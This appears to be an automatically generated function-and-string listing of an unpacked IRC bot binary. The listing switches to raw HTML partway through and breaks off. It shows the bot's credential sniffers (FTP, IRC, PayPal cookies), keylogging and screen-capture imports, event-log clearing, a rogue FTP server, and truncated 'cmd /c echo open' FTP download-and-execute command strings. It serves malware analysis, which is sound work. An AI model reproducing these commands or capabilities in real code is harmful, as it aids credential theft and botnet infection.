sub_outside():
KERNEL32.Sleep
KERNEL32.GetTickCount
KERNEL32.SetErrorMode
KERNEL32.ExitProcess
WS2_32.WSAStartup
WS2_32.WSACleanup
KERNEL32.CreateThread
NTDLL.RtlGetLastWin32Error
WS2_32.getsockname
WS2_32.inet_ntoa
DNSAPI.DnsFlushResolverCache
WS2_32.closesocket
WS2_32.inet_addr
WS2_32.gethostbyname
WS2_32.socket
WS2_32.htons
WS2_32.connect
WS2_32.recv
WS2_32.send
WS2_32.gethostbyaddr
KERNEL32.GetLocaleInfoA
KERNEL32.GetVersionExA
NTDLL.RtlDeleteCriticalSection
KERNEL32.InitializeCriticalSectionAndSpinCount
KERNEL32.ReadFile
KERNEL32.CreateFileA
KERNEL32.SetFilePointer
WS2_32.WSAGetLastError
KERNEL32.CloseHandle
WS2_32.select
WS2_32.getpeername
KERNEL32.TerminateThread
KERNEL32.GetCurrentProcess
WS2_32.bind
WS2_32.listen
WS2_32.accept
WS2_32.__WSAFDIsSet
USER32.GetForegroundWindow
USER32.GetWindowTextA
USER32.GetKeyState
USER32.GetAsyncKeyState
WS2_32.gethostname
WS2_32.WSAIoctl
WS2_32.WSASocketA
WS2_32.setsockopt
WS2_32.htonl
WS2_32.sendto
GDI32.CreateDCA
GDI32.GetDeviceCaps
GDI32.CreateCompatibleDC
GDI32.CreateDIBSection
GDI32.SelectObject
GDI32.BitBlt
GDI32.GetDIBColorTable
GDI32.DeleteObject
GDI32.DeleteDC
WININET.InternetOpenUrlA
WININET.InternetCloseHandle
USER32.FindWindowA
KERNEL32.SearchPathA
KERNEL32.LoadLibraryA
KERNEL32.GetProcessHeap
KERNEL32.CreateToolhelp32Snapshot
KERNEL32.Process32First
KERNEL32.Process32Next
KERNEL32.lstrcmpi
KERNEL32.OpenProcess
KERNEL32.Module32First
KERNEL32.CreatePipe
KERNEL32.GetVersion
KERNEL32.LCMapStringW
KERNEL32.WideCharToMultiByte
KERNEL32.GetStringTypeW
KERNEL32.MultiByteToWideChar
|
sub_4249B3(0126):
KERNEL32.SetUnhandledExceptionFilter
|
sub_416AA3(019e):
"%sKB"
"failed"
|
sub_41263A(078a):
"FTP sniff"
"#Bo"
"NICK "
"220 "
"230 "
"USER "
"PASS "
|
sub_41DFF2(0a41):
KERNEL32.HeapCreate
KERNEL32.HeapDestroy
|
sub_4125C4(0d1f):
"IRC sniff"
"#Bo"
"OPER "
"NICK "
"oper "
"You are now an IRC Operator"
|
sub_40C5B7(0d6f):
WS2_32.inet_ntoa
KERNEL32.CreateThread
KERNEL32.Sleep
KERNEL32.CloseHandle
|
sub_4250D1(0e35):
KERNEL32.LoadLibraryA
"user32.dll"
"MessageBoxA"
"GetActiveWindow"
"GetLastActivePopup"
|
sub_401875(0f5b):
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.closesocket
KERNEL32.Sleep
|
sub_40FA29(0fa0):
KERNEL32.GetFileAttributesA
WS2_32.closesocket
KERNEL32.CreateFileA
KERNEL32.CloseHandle
KERNEL32.CreateThread
NTDLL.RtlGetLastWin32Error
KERNEL32.Sleep
"\\%s"
"%s"
"\n"
"*"
|
sub_418B56(136f):
ADVAPI32.OpenSCManagerA
ADVAPI32.EnumServicesStatusA
NTDLL.RtlGetLastWin32Error
ADVAPI32.CloseServiceHandle
"The following Windows services are regi"...
" Unknown"
" Paused"
" Pausing"
" Continuing"
" Running"
" Stoping"
" Starting"
" Stopped"
"%s: %s (%s)"
|
sub_423287(18d1):
"C:\\m_unpacker\\packed.exe"
|
sub_426153(199d):
KERNEL32.CompareStringW
KERNEL32.CompareStringA
KERNEL32.MultiByteToWideChar
|
sub_4158F2(1c79):
USER32.IsWindow
USER32.SendMessageA
USER32.DestroyWindow
"Window"
|
start(21e8):
ADVAPI32.RegCreateKeyExA
ADVAPI32.RegSetValueExA
ADVAPI32.RegDeleteValueA
ADVAPI32.RegCloseKey
"Windows AntiVirus oo"
|
sub_40BE55(22a3):
"%d.%d.%d.%d"
|
sub_422828(22de):
NTDLL.RtlSizeHeap
|
sub_417F6F(24da):
WS2_32.inet_addr
WS2_32.socket
WS2_32.htons
WS2_32.connect
WS2_32.send
WS2_32.recv
WS2_32.closesocket
|
sub_41A6BE(28ac):
WS2_32.htons
WS2_32.socket
WS2_32.connect
KERNEL32.GetTickCount
WS2_32.send
WS2_32.closesocket
"POST / HTTP/1.0\r\nHost: %s\r\nContent-Leng"...
"\r\n"
|
sub_40B8B2(28ed):
WS2_32.inet_ntoa
|
sub_4175A9(2950):
KERNEL32.GetProcessHeap
NTDLL.RtlAllocateHeap
NTDLL.RtlFreeHeap
|
sub_41123B(2ae6):
WS2_32.send
WS2_32.recv
|
sub_4194C0(2bcd):
"Username accounts for local system:"
" %S"
"Total users found: %d."
|
sub_40AA20(2cf7):
IPHLPAPI.GetIpNetTable
IPHLPAPI.DeleteIpNetEntry
|
sub_422FF2(2f2e):
KERNEL32.UnhandledExceptionFilter
|
sub_411D74(3823):
KERNEL32.GetLocalTime
"\\"
"winnt99.bat"
"ab"
"[%d-%d-%d %d:%d:%d] %s\r\n"
|
sub_40BE0D(3b1d):
WS2_32.htonl
|
sub_41BFCC(3d17):
NTDLL.RtlGetLastWin32Error
|
sub_4186C5(3f0f):
KERNEL32.GetVersionExA
ADVAPI32.OpenEventLogA
ADVAPI32.ClearEventLogA
NTDLL.RtlGetLastWin32Error
|
sub_40F360(4036):
WS2_32.WSAStartup
WS2_32.socket
WS2_32.inet_addr
WS2_32.htons
WS2_32.connect
WS2_32.closesocket
WS2_32.WSACleanup
|
sub_41A89B(4107):
"www.schlund.net"
"www.utwente.nl"
"verio.fr"
"www.1und1.de"
"www.switch.ch"
"www.belwue.de"
"de.yahoo.com"
"www.google.it"
"www.xo.net"
"www.stanford.edu"
"www.verio.com"
"www.nocster.com"
"www.rit.edu"
"www.cogentco.com"
"www.burst.net"
"nitro.ucsc.edu"
"www.level3.com"
"www.above.net"
"www.easynews.com"
"www.google.com"
"www.lib.nthu.edu.tw"
"www.st.lib.keio.ac.jp"
"www.d1asia.com"
"www.nifty.com"
"yahoo.co.jp"
"www.google.co.jp"
|
sub_40E2E5(4c1f):
WS2_32.inet_addr
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.recv
WS2_32.send
WS2_32.closesocket
"ibmcvevvpwy.exe"
"cmd /c echo open %s %d >> ii &echo user"...
|
sub_40B63A(4c22):
" Scan Time: %s."
|
sub_419828(4dbc):
ADVAPI32.LookupPrivilegeValueA
ADVAPI32.AdjustTokenPrivileges
KERNEL32.CloseHandle
|
sub_40E69E(4e3f):
WS2_32.inet_addr
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.recv
WS2_32.send
WS2_32.closesocket
"ibmcvevvpwy.exe"
"cmd /k echo open %s %d >> ii &echo user"...
|
sub_41AF92(4f24):
WININET.InternetCrackUrlA
WININET.InternetConnectA
WININET.HttpOpenRequestA
WININET.HttpSendRequestA
WININET.InternetCloseHandle
|
sub_421BF9(502f):
"e+000"
|
sub_40BF8E(5047):
KERNEL32.GetTickCount
WS2_32.inet_ntoa
NTDLL.RtlEnterCriticalSection
NTDLL.RtlLeaveCriticalSection
KERNEL32.Sleep
"sym"
|
sub_410FCB(5689):
KERNEL32.CreatePipe
NTDLL.RtlGetLastWin32Error
KERNEL32.CloseHandle
|
sub_41AB62(5868):
KERNEL32.Sleep
|
sub_41EE8E(58ed):
KERNEL32.VirtualAlloc
|
sub_416A5B(5b85):
KERNEL32.GetDiskFreeSpaceExA
|
sub_40D066(5f99):
WS2_32.send
"GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
|
sub_41B3F2(6050):
NTDLL.RtlAllocateHeap
NTDLL.RtlReAllocateHeap
|
sub_422A04(6091):
KERNEL32.SetFilePointer
NTDLL.RtlGetLastWin32Error
|
sub_425912(6338):
"1#SNAN"
"1#IND"
"1#INF"
"1#QNAN"
|
sub_4189D8(6353):
"The specified service name is invalid."
"The requested control code is undefined"...
"The handle is invalid."
"The handle does not have the required a"...
"The service binary file could not be fo"...
"The service cannot be stopped because o"...
"The database is locked."
"A thread could not be created for the s"...
"The process for the service was started"...
"The requested control code is not valid"...
"An instance of the service is already r"...
"The system is shutting down."
"An unknown error occurred: <%ld>"
|
sub_41E7A5(64eb):
KERNEL32.VirtualAlloc
|
sub_40ED60(66d7):
WS2_32.WSAStartup
WS2_32.socket
WS2_32.setsockopt
WS2_32.ioctlsocket
WS2_32.htons
WS2_32.bind
WS2_32.listen
WS2_32.select
WS2_32.__WSAFDIsSet
WS2_32.accept
WS2_32.send
WS2_32.recv
WS2_32.closesocket
"220 StnyFtpd 0wns j0\n"
"%s %s"
"USER"
"331 Password required\n"
"PASS"
"230 User logged in.\n"
"SYST"
"215 StnyFtpd\n"
"REST"
"350 Restarting.\n"
"257 \"/\" is current directory.\n"
"TYPE"
"A"
"200 Type set to A.\n"
"TYPE"
"I"
"200 Type set to I.\n"
"PASV"
"425 Passive not supported on this serve"...
"LIST"
"226 Transfer complete\n"
"PORT"
"%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
"%x%x\n"
"%s.%s.%s.%s"
"200 PORT command successful.\n"
"RETR"
"150 Opening BINARY mode data connection"...
"226 Transfer complete.\n"
"[FTP]: I just owned: %s"
"425 Can't open data connection.\n"
"QUIT"
"221 Goodbye happy r00ting.\n"
|
sub_4240A6(66df):
KERNEL32.WideCharToMultiByte
|
sub_41714F(6944):
KERNEL32.GetProcessHeap
NTDLL.RtlAllocateHeap
NTDLL.RtlFreeHeap
"WINLOGON"
"NWGINA"
"MSGINA"
|
sub_415B31(69df):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegQueryValueExA
ADVAPI32.RegCloseKey
"r"
"="
"="
|
sub_4238CD(69e9):
""
"..."
"Runtime Error!\n\nProgram: "
"\n\n"
"Microsoft Visual C++ Runtime Library"
|
sub_423BE3(6be0):
NTDLL.RtlGetLastWin32Error
|
sub_40E78C(6bfa):
WS2_32.inet_addr
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.send
WS2_32.closesocket
|
sub_415EA1(6c15):
WS2_32.socket
WS2_32.htons
WS2_32.bind
WS2_32.getsockname
WS2_32.listen
KERNEL32.CreateFileA
WS2_32.inet_addr
WS2_32.htonl
WS2_32.select
WS2_32.accept
WS2_32.closesocket
KERNEL32.SetFilePointer
KERNEL32.ReadFile
WS2_32.send
WS2_32.recv
KERNEL32.CloseHandle
WS2_32.inet_ntoa
|
sub_41B2A1(6c37):
NTDLL.RtlFreeHeap
|
sub_40F477(6cf2):
WS2_32.htons
WS2_32.socket
WS2_32.bind
WS2_32.listen
WS2_32.ioctlsocket
WS2_32.select
WS2_32.__WSAFDIsSet
WS2_32.accept
WS2_32.recv
WS2_32.closesocket
WS2_32.WSAGetLastError
"GET "
" "
"\r\n"
|
sub_417B38(7166):
"-|`_\\{[]}"
"-|`_\\{[]}"
"-|`_\\{[]}"
"-|`_\\{[]}"
|
sub_416F7D(740a):
KERNEL32.LoadLibraryA
KERNEL32.GetEnvironmentVariableW
"SeDebugPrivilege"
"NTDLL.DLL"
"NtQuerySystemInformation"
"RtlCreateQueryDebugBuffer"
"RtlQueryProcessDebugInformation"
"RtlDestroyQueryDebugBuffer"
"RtlRunDecodeUnicodeString"
"USERNAME"
"USERDOMAIN"
"SeDebugPrivilege"
|
sub_41B703(7566):
NTDLL.RtlAllocateHeap
|
sub_414C60(772a):
WS2_32.connect
WS2_32.ioctlsocket
WS2_32.select
WS2_32.__WSAFDIsSet
WS2_32.getsockopt
|
sub_419BEB(7918):
KERNEL32.CloseHandle
|
sub_4124AD(79f8):
"Bot sniff"
"#Bo"
"[PSNIFF]:"
"PSNIFF//"
"JOIN #"
"302 "
"366 "
":.login"
":!login"
":!Login"
":.Login"
":.ident"
":!ident"
":.hashin"
":!hashin"
|
sub_4137F8(79fd):
WS2_32.htons
WS2_32.socket
WS2_32.ioctlsocket
WS2_32.connect
KERNEL32.Sleep
WS2_32.closesocket
|
sub_4234D4(7fa9):
KERNEL32.GetEnvironmentStringsW
KERNEL32.GetEnvironmentStrings
KERNEL32.WideCharToMultiByte
KERNEL32.FreeEnvironmentStringsW
|
sub_4268EC(822d):
"invalid string position"
|
sub_4266C0(822d):
"string too long"
|
sub_426C4A(83a2):
KERNEL32.LCMapStringW
KERNEL32.WideCharToMultiByte
KERNEL32.MultiByteToWideChar
|
sub_417759(8474):
WS2_32.socket
WS2_32.htons
WS2_32.inet_addr
WS2_32.gethostbyname
WS2_32.connect
WS2_32.closesocket
|
sub_41DC92(84ec):
KERNEL32.CloseHandle
NTDLL.RtlGetLastWin32Error
|
sub_41E04F(8555):
NTDLL.RtlAllocateHeap
|
sub_40B1F9(8732):
"%s %s stopped. (%d thread(s) stopped.)"
"%s No %s thread found."
|
sub_40BEF1(8768):
WS2_32.socket
WS2_32.htons
WS2_32.ioctlsocket
WS2_32.connect
WS2_32.select
WS2_32.closesocket
|
sub_41E0C2(87ad):
KERNEL32.VirtualFree
NTDLL.RtlFreeHeap
|
sub_4190F2(893c):
"Account: %S"
"Full Name: %S"
"User Comment: %S"
"Comment: %S"
"Unknown"
"Administrator"
"User"
"Guest"
"Privilege Level: %s"
"Auth Flags: %d"
"Home Directory: %S"
"Parameters: %S"
"Password Age: %d"
"Bad Password Count: %d"
"Number of Logins: %d"
"Last Logon: %d"
"Last Logoff: %d"
"Logon Server: %S"
"Country Code: %d"
"User's Language: %d"
"Max. Storage: %d"
|
sub_40FCD8(8a1e):
WS2_32.send
KERNEL32.FindFirstFileA
KERNEL32.FindNextFileA
KERNEL32.Sleep
"\n"
"PRIVMSG %s :Searching for: %s\r\n"
"\r\n\r\nIndex of %s</TIT"...
"<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
"<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
"<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
".."
"."
"PM"
"AM"
"%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
"<%s>"
"PRIVMSG %s :%-31s %-21s\n"
"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
"%s%s/"
"\"><CODE>%.29s>/</CODE></A>"
"\"><CODE>%s/</CODE></A>"
"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
"<%s>"
"%-31s %-21s\r\n"
"PRIVMSG %s :%-31s %-21s (%s bytes)\n"
"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
"\"><CODE>%.30s></CODE></A>"
"\"><CODE>%s</CODE></A>"
"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
"%-31s %-21s (%i bytes)\r\n"
"PRIVMSG %s :Found %s Files and %s Direc"...
"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
"Found: %i Files and %i Directories\r\n"
</font></pre></td></tr><tr id="sub_41CD64"><td><pre><a name="sub_41CD64"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41CD64"><font size=+2>sub_41CD64</a>(8af0)</font>:<font color=darkgreen>
NTDLL.RtlUnwind</font>
<font color=brown></font></pre></td></tr><tr id="sub_418D55"><td><pre><a name="sub_418D55"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_418D55"><font size=+2>sub_418D55</a>(8cdb)</font>:<font color=darkgreen>
KERNEL32.WideCharToMultiByte</font>
<font color=brown></font></pre></td></tr><tr id="sub_4172D8"><td><pre><a name="sub_4172D8"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_4172D8"><font size=+2>sub_4172D8</a>(8d16)</font>:<font color=darkgreen>
KERNEL32.GetSystemInfo
KERNEL32.GetProcessHeap
NTDLL.RtlAllocateHeap
KERNEL32.ReadProcessMemory
KERNEL32.VirtualQueryEx
NTDLL.RtlFreeHeap
KERNEL32.CloseHandle</font>
<font color=brown></font></pre></td></tr><tr id="sub_4183BA"><td><pre><a name="sub_4183BA"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_4183BA"><font size=+2>sub_4183BA</a>(8e50)</font>:<font color=darkgreen>
USER32.OpenClipboard
USER32.GetClipboardData
KERNEL32.GlobalLock
KERNEL32.GlobalUnlock
USER32.CloseClipboard</font>
<font color=brown></font></pre></td></tr><tr id="sub_409966"><td><pre><a name="sub_409966"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_409966"><font size=+2>sub_409966</a>(8eab)</font>:<font color=darkgreen>
WS2_32.send
KERNEL32.Sleep</font>
<font color=brown>
"NOTICE"
"PRIVMSG"
"%s"
"%s %s :%s\r\n"
</font></pre></td></tr><tr id="sub_426ED5"><td><pre><a name="sub_426ED5"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_426ED5"><font size=+2>sub_426ED5</a>(9045)</font>:<font color=darkgreen>
KERNEL32.GetStringTypeW
KERNEL32.WideCharToMultiByte</font>
<font color=brown></font></pre></td></tr><tr id="sub_41D5DE"><td><pre><a name="sub_41D5DE"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41D5DE"><font size=+2>sub_41D5DE</a>(91cb)</font>:<font color=darkgreen>
KERNEL32.GetFileAttributesA
NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_418E8B"><td><pre><a name="sub_418E8B"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_418E8B"><font size=+2>sub_418E8B</a>(935d)</font>:<font color=darkgreen>
ADVAPI32.IsValidSecurityDescriptor</font>
<font color=brown>
"Share name: Resource: "...
"Yes"
"No"
"%-14S %-24S %-6u %-4s"
</font></pre></td></tr><tr id="sub_40C930"><td><pre><a name="sub_40C930"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_40C930"><font size=+2>sub_40C930</a>(94d6)</font>:<font color=brown>
"BBBB"
"CCCC"
</font></pre></td></tr><tr id="sub_41DA54"><td><pre><a name="sub_41DA54"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41DA54"><font size=+2>sub_41DA54</a>(95ea)</font>:<font color=darkgreen>
KERNEL32.MultiByteToWideChar
NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_41A6A4"><td><pre><a name="sub_41A6A4"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41A6A4"><font size=+2>sub_41A6A4</a>(963b)</font>:<font color=darkgreen>
KERNEL32.GetTickCount</font>
<font color=brown></font></pre></td></tr><tr id="sub_40CD05"><td><pre><a name="sub_40CD05"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_40CD05"><font size=+2>sub_40CD05</a>(981b)</font>:<font color=darkgreen>
WS2_32.htonl
WS2_32.send</font>
<font color=brown></font></pre></td></tr><tr id="sub_42410E"><td><pre><a name="sub_42410E"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_42410E"><font size=+2>sub_42410E</a>(9a80)</font>:<font color=darkgreen>
KERNEL32.MultiByteToWideChar</font>
<font color=brown></font></pre></td></tr><tr id="sub_41D271"><td><pre><a name="sub_41D271"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41D271"><font size=+2>sub_41D271</a>(9ac8)</font>:<font color=darkgreen>
KERNEL32.GetLocalTime</font>
<font color=brown></font></pre></td></tr><tr id="sub_419636"><td><pre><a name="sub_419636"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_419636"><font size=+2>sub_419636</a>(9bb4)</font>:<font color=brown>
"Invalid parameter."
"Server name not found."
"This network request is not supported."
"Not enough memory."
"The name is invalid."
"Duplicate share name."
"Invalid for redirected resource."
"Device or directory does not exist."
"Level parameter is invalid."
"A general failure occurred in the netwo"...
"The operation is allowed only on the pr"...
"The user account already exists."
"The group already exists."
"The password is shorter than required ("...
"An unknown error occurred."
"The computer name is invalid."
"Share not found."
"The user name could not be found."
"Network connection not found."
</font></pre></td></tr><tr id="sub_41851B"><td><pre><a name="sub_41851B"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41851B"><font size=+2>sub_41851B</a>(9dbe)</font>:<font color=darkgreen>
USER32.ExitWindowsEx</font>
<font color=brown>
"SeShutdownPrivilege"
</font></pre></td></tr><tr id="sub_40CE29"><td><pre><a name="sub_40CE29"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_40CE29"><font size=+2>sub_40CE29</a>(a2f7)</font>:<font color=darkgreen>
WS2_32.send</font>
<font color=brown></font></pre></td></tr><tr id="sub_417826"><td><pre><a name="sub_417826"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_417826"><font size=+2>sub_417826</a>(a46d)</font>:<font color=darkgreen>
WS2_32.send</font>
<font color=brown>
" "
"PING"
"433"
</font></pre></td></tr><tr id="sub_401132"><td><pre><a name="sub_401132"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_401132"><font size=+2>sub_401132</a>(a474)</font>:<font color=darkgreen>
WS2_32.closesocket
WS2_32.WSACleanup
KERNEL32.Sleep
KERNEL32.CloseHandle
KERNEL32.ExitProcess</font>
<font color=brown></font></pre></td></tr><tr id="sub_40B0AC"><td><pre><a name="sub_40B0AC"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_40B0AC"><font size=+2>sub_40B0AC</a>(a84d)</font>:<font color=darkgreen>
WS2_32.closesocket</font>
<font color=brown></font></pre></td></tr><tr id="sub_423C7E"><td><pre><a name="sub_423C7E"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_423C7E"><font size=+2>sub_423C7E</a>(a946)</font>:<font color=darkgreen>
KERNEL32.CreateFileA
KERNEL32.CloseHandle
NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_418936"><td><pre><a name="sub_418936"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_418936"><font size=+2>sub_418936</a>(a9bc)</font>:<font color=darkgreen>
ADVAPI32.OpenSCManagerA
NTDLL.RtlGetLastWin32Error
ADVAPI32.OpenServiceA
ADVAPI32.ControlService
ADVAPI32.StartServiceA
ADVAPI32.DeleteService
ADVAPI32.CloseServiceHandle</font>
<font color=brown></font></pre></td></tr><tr id="sub_409A01"><td><pre><a name="sub_409A01"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_409A01"><font size=+2>sub_409A01</a>(aaa2)</font>:<font color=darkgreen>
KERNEL32.GetModuleHandleA
NTDLL.RtlGetLastWin32Error
KERNEL32.LoadLibraryA
WININET.InternetOpenA</font>
<font color=brown>
"kernel32.dll"
"SetErrorMode"
"CreateToolhelp32Snapshot"
"Process32First"
"GetDiskFreeSpaceExA"
"GetLogicalDriveStringsA"
"SearchPathA"
"QueryPerformanceCounter"
"QueryPerformanceFrequency"
"RegisterServiceProcess"
"user32.dll"
"SendMessageA"
"FindWindowA"
"IsWindow"
"GetClipboardData"
"CloseClipboard"
"GetAsyncKeyState"
"GetKeyState"
"GetWindowTextA"
"GetForegroundWindow"
"advapi32.dll"
"RegCreateKeyExA"
"RegSetValueExA"
"RegQueryValueExA"
"RegDeleteValueA"
"RegCloseKey"
"ClearEventLogA"
"OpenProcessToken"
"LookupPrivilegeValueA"
"AdjustTokenPrivileges"
"OpenSCManagerA"
"OpenServiceA"
"ControlService"
"CloseServiceHandle"
"EnumServicesStatusA"
"IsValidSecurityDescriptor"
"GetUserNameA"
"gdi32.dll"
"CreateDCA"
"CreateDIBSection"
"CreateCompatibleDC"
"GetDIBColorTable"
"SelectObject"
"BitBlt"
"DeleteDC"
"DeleteObject"
"ws2_32.dll"
"WSAStartup"
"WSASocketA"
"WSAAsyncSelect"
"__WSAFDIsSet"
"WSAIoctl"
"WSAGetLastError"
"WSACleanup"
"socket"
"ioctlsocket"
"connect"
"inet_ntoa"
"inet_addr"
"htons"
"htonl"
"ntohs"
"ntohl"
"send"
"sendto"
"recv"
"recvfrom"
"bind"
"select"
"listen"
"accept"
"setsockopt"
"getsockname"
"gethostname"
"getpeername"
"closesocket"
"wininet.dll"
"InternetGetConnectedState"
"InternetGetConnectedStateEx"
"HttpOpenRequestA"
"HttpSendRequestA"
"InternetConnectA"
"InternetOpenUrlA"
"InternetCrackUrlA"
"InternetReadFile"
"InternetCloseHandle"
"Mozilla/4.0 (compatible)"
"icmp.dll"
"IcmpCreateFile"
"IcmpCloseHandle"
"IcmpSendEcho"
"netapi32.dll"
"NetShareAdd"
"NetShareDel"
"NetShareEnum"
"NetScheduleJobAdd"
"NetApiBufferFree"
"NetRemoteTOD"
"NetUserAdd"
"NetUserDel"
"NetUserEnum"
"NetUserGetInfo"
"NetMessageBufferSend"
"NetWkstaGetInfo"
"dnsapi.dll"
"DnsFlushResolverCache"
"DnsFlushResolverCacheEntry_A"
"iphlpapi.dll"
"DeleteIpNetEntry"
"mpr.dll"
"WNetAddConnection2A"
"WNetAddConnection2W"
"WNetCancelConnection2A"
"WNetCancelConnection2W"
"shell32.dll"
"SHChangeNotify"
"odbc32.dll"
"SQLDriverConnect"
"SQLAllocHandle"
"avicap32.dll"
"capCreateCaptureWindowA"
"capGetDriverDescriptionA"
</font></pre></td></tr><tr id="sub_40A6BD"><td><pre><a name="sub_40A6BD"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_40A6BD"><font size=+2>sub_40A6BD</a>(ac3c)</font>:<font color=brown>
"Kernel32.dll failed. <%d>"
"User32.dll failed. <%d>"
"Advapi32.dll failed. <%d>"
"Gdi32.dll failed. <%d>"
"Ws2_32.dll failed. <%d>"
"Wininet.dll failed. <%d>"
"Icmp.dll failed. <%d>"
"Netapi32.dll failed. <%d>"
"Dnsapi.dll failed. <%d>"
"Iphlpapi.dll failed. <%d>"
"Mpr32.dll failed. <%d>"
"Shell32.dll failed. <%d>"
"Odbc32.dll failed. <%d>"
"Avicap32.dll failed. <%d>"
</font></pre></td></tr><tr id="sub_426B9B"><td><pre><a name="sub_426B9B"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_426B9B"><font size=+2>sub_426B9B</a>(aeff)</font>:<font color=darkgreen>
KERNEL32.RaiseException</font>
<font color=brown></font></pre></td></tr><tr id="sub_41DC6E"><td><pre><a name="sub_41DC6E"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41DC6E"><font size=+2>sub_41DC6E</a>(af5c)</font>:<font color=darkgreen>
KERNEL32.ExitProcess</font>
<font color=brown></font></pre></td></tr><tr id="sub_418E27"><td><pre><a name="sub_418E27"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_418E27"><font size=+2>sub_418E27</a>(afa1)</font>:<font color=darkgreen>
KERNEL32.MultiByteToWideChar</font>
<font color=brown></font></pre></td></tr><tr id="sub_413991"><td><pre><a name="sub_413991"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_413991"><font size=+2>sub_413991</a>(afc0)</font>:<font color=darkgreen>
WS2_32.WSAStartup
WS2_32.WSASocketA
WS2_32.setsockopt
WS2_32.htons
WS2_32.htonl
WS2_32.sendto
WS2_32.closesocket
WS2_32.WSACleanup
WS2_32.WSAGetLastError</font>
<font color=brown></font></pre></td></tr><tr id="sub_416A12"><td><pre><a name="sub_416A12"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_416A12"><font size=+2>sub_416A12</a>(b2db)</font>:<font color=darkgreen>
KERNEL32.GetDriveTypeA</font>
<font color=brown>
"Cdrom"
"Network"
"Disk"
"Invalid"
"Unknown"
</font></pre></td></tr><tr id="sub_40C4C6"><td><pre><a name="sub_40C4C6"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_40C4C6"><font size=+2>sub_40C4C6</a>(b7e3)</font>:<font color=darkgreen>
WS2_32.inet_ntoa
KERNEL32.CreateThread
KERNEL32.Sleep
KERNEL32.CloseHandle
WS2_32.htonl</font>
<font color=brown></font></pre></td></tr><tr id="sub_424A3C"><td><pre><a name="sub_424A3C"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_424A3C"><font size=+2>sub_424A3C</a>(b95a)</font>:<font color=darkgreen>
KERNEL32.WideCharToMultiByte</font>
<font color=brown>
"TZ"
</font></pre></td></tr><tr id="sub_4126C1"><td><pre><a name="sub_4126C1"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_4126C1"><font size=+2>sub_4126C1</a>(b9cf)</font>:<font color=brown>
"HTTP sniff"
"#Bo"
"paypal"
"PAYPAL"
"PAYPAL.COM"
"paypal.com"
"Set-Cookie:"
</font></pre></td></tr><tr id="sub_4019DB"><td><pre><a name="sub_4019DB"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_4019DB"><font size=+2>sub_4019DB</a>(be9b)</font>:<font color=darkgreen>
WS2_32.send
WS2_32.closesocket
KERNEL32.Sleep
WS2_32.recv</font>
<font color=brown>
"PASS %s\r\n"
</font></pre></td></tr><tr id="sub_40AEA6"><td><pre><a name="sub_40AEA6"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_40AEA6"><font size=+2>sub_40AEA6</a>(c0f8)</font>:<font color=darkgreen>
KERNEL32.GetTickCount</font>
<font color=brown>
